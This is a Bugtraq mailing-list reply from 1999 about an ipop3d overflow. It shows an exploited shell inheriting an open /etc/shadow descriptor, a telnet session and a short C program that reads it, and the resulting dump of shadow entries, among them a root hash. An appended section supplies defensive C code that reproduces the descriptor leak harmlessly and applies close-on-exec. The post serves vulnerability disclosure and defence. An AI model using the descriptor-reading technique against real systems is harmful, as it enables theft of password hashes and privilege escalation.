Bugtraq mailing list archives
Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight
From: woloszyn () it pl (M.C.Mar)
Date: Thu, 8 Apr 1999 16:39:30 +0200
On Tue, 6 Apr 1999, Stefan Rompf wrote:
> Hello Michal,
>
> At 01:41 07.03.99 +0100, you wrote:
>
> > Exploited overflow in ipop3d could be used to gain superuser access
> > (the only thing done by ipop3d is setuid+setgid, no seteuid/setreuid).
>
> Fortunately, you are wrong here. Quoting from the Solaris' setuid()
> manpage:
>
>     If the effective user ID of the process calling setuid() is the
>     super-user, the real, effective, and saved user IDs are set to the
>     uid parameter.
>
> Linux behaves the same way, IMHO this is defined in POSIX.
But, (un)fortunately when exploiting ipop3d I found something like this:

    Grabarz:~emsi# lsof -n | grep 1190
    sh   1190 emsi  cwd  DIR  8,1    1024     2 /
    sh   1190 emsi  rtd  DIR  8,1    1024     2 /
    sh   1190 emsi  txt  REG  8,1  279352 16324 /bin/bash
    sh   1190 emsi  mem  REG  8,1   78828 30629 /lib/ld-linux.so.1.9.5
    sh   1190 emsi  mem  REG  8,1   11493 79564 /lib/libtermcap.so.2.0.8
    sh   1190 emsi  mem  REG  8,1  605044 79566 /lib/libc.so.5.4.33
    [...]
    sh   1190 emsi    3r REG  8,1     598 24674 /etc/shadow

Shell spawned via ipop3d exploitation (no bonus -- no exploit core) inherits opened fd :)

So we may do something like this:

    emsi:~emsi# telnet grabarz 110
    Trying 192.168.0.19...
    Connected to grabarz.
    Escape character is '^]'.
    +OK Grabarz POP3 3.3(20) w/IMAP2 client (Comments to MRC () CAC Washington EDU) at Fri, 9 Apr 1999 15:19:33 +0000 ( )
    user emsi
    +OK User name accepted, password please
    pass qpqp01
    id;
    uid=1002(emsi) gid=100(users) groups=100(users)
    : command not found
    bash -i;
    bash$ cd ~emsi
    cd ~emsi
    bash$
    bash$ cat p.c
    cat p.c
    #include <stdio.h>
    #include <unistd.h>
    int main(void) {               /* fd 3 is /etc/shadow, inherited from ipop3d */
        char buf[256];
        lseek(3, 0, SEEK_SET);
        ssize_t n = read(3, buf, 255);
        buf[n > 0 ? n : 0] = '\0';  /* terminate before printing with %s */
        printf("Be my guest:\n%s\n", buf);
        return 0;
    }
    bash$
    bash$ gcc p.c
    gcc p.c
    bash$ ./a.out
    Be my guest:
    root:csKcGWMEUMGUs:10539:0:::::
    halt:*:9797:0:::::
    operator:*:9797:0:::::
    shutdown:*:9797:0:::::
    sync:*:9797:0:::::
    bin:*:9797:0:::::
    ftp:*:9797:0:::::
    daemon:*:9797:0:::::
    adm:*:9797:0:::::
    lp:*:9797:0:::::
    mail:*:9797:0:::::
    postmaster:*:9797:0:::::
    new¿¤þ^ `
    bash$
    bash$

That's only an example... It proves that exploiting ipop3d could be useful to obtain root (or any other account) access and that the vulnerability should be fixed.

P.S. Greetings Lam3rZ Group, 3Kombajd_do_czereśni testers and Lcamtuf (you lamer, will you finally send me that txt you promised me? ;).

-- 
___________________________________________________________________________
M.C.Mar         An NT server can be run by an idiot, and usually is.
emsi () it pl   "If you can't make it good, make it LOOK good." - Bill Gates
Maybe this isn't the place, but M$ programs, for instance, are peculiar monuments to stupidity.
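Added example (my own code, not from the post above nor from ipop3d): it reproduces the descriptor leak the post demonstrates using a harmless stand-in file, checks for it the way a defender would (does a freshly exec'd /bin/sh still see the descriptor?), and applies the standard fix of marking every descriptor close-on-exec before anything less trusted can run. The function names and the use of /dev/null as the stand-in for /etc/shadow are assumptions; the check requires a POSIX /bin/sh.

```c
#include <fcntl.h>
#include <stdio.h>
#include <sys/wait.h>
#include <unistd.h>

/* Ask a freshly exec'd /bin/sh whether descriptor `fd` is still open:
 * ": <&N" succeeds only if N is a valid readable descriptor. This is the
 * defender's check for the leak shown in the post (shell inherits
 * /etc/shadow on fd 3). Returns 1 = open after exec, 0 = closed, -1 = error. */
int fd_open_after_exec(int fd) {
    char cmd[32];
    int status;
    snprintf(cmd, sizeof cmd, ": <&%d", fd);
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
}

/* Mitigation: mark every descriptor >= 3 close-on-exec so nothing a
 * daemon opened (e.g. /etc/shadow) survives into an exec'd program.
 * Returns the number of descriptors marked. */
int mark_all_cloexec(int max_fd) {
    int marked = 0;
    for (int fd = 3; fd < max_fd; fd++) {
        int flags = fcntl(fd, F_GETFD);
        if (flags == -1) continue;                          /* not open */
        if (fcntl(fd, F_SETFD, flags | FD_CLOEXEC) == 0) marked++;
    }
    return marked;
}

/* Reproduce the leak with a harmless file (constructed stand-in for
 * /etc/shadow), then apply the fix. Returns 1 if the leak was observed
 * before and gone after, 0 otherwise, -1 on error. */
int demo_leak_and_fix(void) {
    int fd = open("/dev/null", O_RDONLY);   /* no O_CLOEXEC, like ipop3d */
    if (fd < 0) return -1;
    int before = fd_open_after_exec(fd);
    mark_all_cloexec(fd + 1);
    int after = fd_open_after_exec(fd);
    close(fd);
    if (before < 0 || after < 0) return -1;
    return before == 1 && after == 0;
}
```

The same fcntl loop, or opening files with O_CLOEXEC in the first place, is what a privileged daemon should do before it drops privileges or runs any external program.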
Current thread:
- Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight, (continued)
- Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight Miguel de Icaza (Apr 11)
- Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight Miguel de Icaza (Apr 05)
- Multiple WinGate Vulnerabilities[Tad late] Marc (Apr 05)
- Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight Stefan Rompf (Apr 06)
- Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight Viktor Fougstedt (Apr 07)
- security hole (READ AS: security chasm) in ICQ-Webserver DaChronic (Apr 07)
- Re: security hole (READ AS: security chasm) in ICQ-Webserver sven () MSC-MEDIA COM (Apr 08)
- Bug in Winroute 3.04g Michael R. Rudel (Apr 08)
- Re: Bug in Winroute 3.04g Max Vision (Apr 09)
- Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight Viktor Fougstedt (Apr 07)
- Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight Casper Dik (Apr 08)
- Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight M.C.Mar (Apr 08)